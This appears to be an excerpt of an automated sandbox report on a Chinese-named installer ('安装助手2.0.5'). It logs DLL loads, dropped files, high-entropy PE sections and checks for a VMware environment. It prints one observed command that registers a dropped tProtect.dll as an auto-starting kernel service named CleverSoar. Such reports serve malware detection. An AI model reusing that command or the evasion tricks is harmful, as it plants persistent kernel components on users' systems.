Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Section loaded: apphelp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe | Static file information: File size 7064515 > 1048576
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 00000013.00000003.1430369809.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 00000013.00000003.1430551725.00000000037B0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 17_2_00AF57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 17_2_00AF57D0
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp.10.dr | Static PE information: real checksum: 0x0 should be: 0x343b7c
Source: update.vac.11.dr | Static PE information: real checksum: 0x0 should be: 0x378c79
Source: update.vac.6.dr | Static PE information: real checksum: 0x0 should be: 0x378c79
Source: tProtect.dll.19.dr | Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: hrsw.vbc.11.dr | Static PE information: real checksum: 0x0 should be: 0x378c79
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe | Static PE information: real checksum: 0x0 should be: 0x6c7c7d
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp.4.dr | Static PE information: real checksum: 0x0 should be: 0x343b7c
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe | Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp.4.dr | Static PE information: section name: .didata
Source: update.vac.6.dr | Static PE information: section name: .00cfg
Source: update.vac.6.dr | Static PE information: section name: .voltbl
Source: update.vac.6.dr | Static PE information: section name: .#.q
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp.10.dr | Static PE information: section name: .didata
Source: 7zr.exe.11.dr | Static PE information: section name: .sxdata
Source: update.vac.11.dr | Static PE information: section name: .00cfg
Source: update.vac.11.dr | Static PE information: section name: .voltbl
Source: update.vac.11.dr | Static PE information: section name: .#.q
Source: hrsw.vbc.11.dr | Static PE information: section name: .00cfg
Source: hrsw.vbc.11.dr | Static PE information: section name: .voltbl
Source: hrsw.vbc.11.dr | Static PE information: section name: .#.q
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C918C5B push ecx; ret 11_2_6C918C6E
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C7C0F00 push ss; retn 0001h 11_2_6C7C0F0A
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C9E6F10 push eax; ret 11_2_6C9E6F2E
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C94B9F4 push 004AC35Ch; ret 11_2_6C94BA0E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 17_2_00A745F4 push 00B1C35Ch; ret 17_2_00A7460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 17_2_00B0FB10 push eax; ret 17_2_00B0FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 17_2_00B0FE90 push eax; ret 17_2_00B0FEBE
Source: update.vac.6.dr | Static PE information: section name: .#.q entropy: 7.193027440134885
Source: update.vac.11.dr | Static PE information: section name: .#.q entropy: 7.193027440134885
Source: hrsw.vbc.11.dr | Static PE information: section name: .#.q entropy: 7.193027440134885
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | File created: C:\Users\user\AppData\Local\Temp\is-3SJ46.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe | File created: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe | File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe | File created: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | File created: C:\Users\user\AppData\Local\Temp\is-GHUQ4.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | File created: C:\Users\user\AppData\Local\Temp\is-GHUQ4.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | File created: C:\Users\user\AppData\Local\Temp\is-3SJ46.tmp\update.vac
Source: C:\Windows\System32\svchost.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | System information queried: FirmwareTableInformation
Source: C:\Windows\System32\svchost.exe | File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6565
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3241
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Window / User API: threadDelayed 591
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Window / User API: threadDelayed 609
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Window / User API: threadDelayed 561
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3SJ46.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GHUQ4.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GHUQ4.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3SJ46.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe | API coverage: 7.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\Windows\System32 FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C90B430 FindFirstFileA,FindClose, 11_2_6C90B430
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 17_2_00A76868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 17_2_00A76868
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 17_2_00A77496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 17_2_00A77496
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 17_2_00A79C60 GetSystemInfo, 17_2_00A79C60
Source: svchost.exe, 00000001.00000002.1610362591.0000016102642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000001.00000002.1611745576.000001610267B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000002.1392732103.000000000144F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 00000001.00000002.1609497882.0000016102602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: svchost.exe, 00000001.00000002.1610886823.0000016102653000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000e1}
Source: svchost.exe, 00000001.00000002.1610362591.000001610262B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
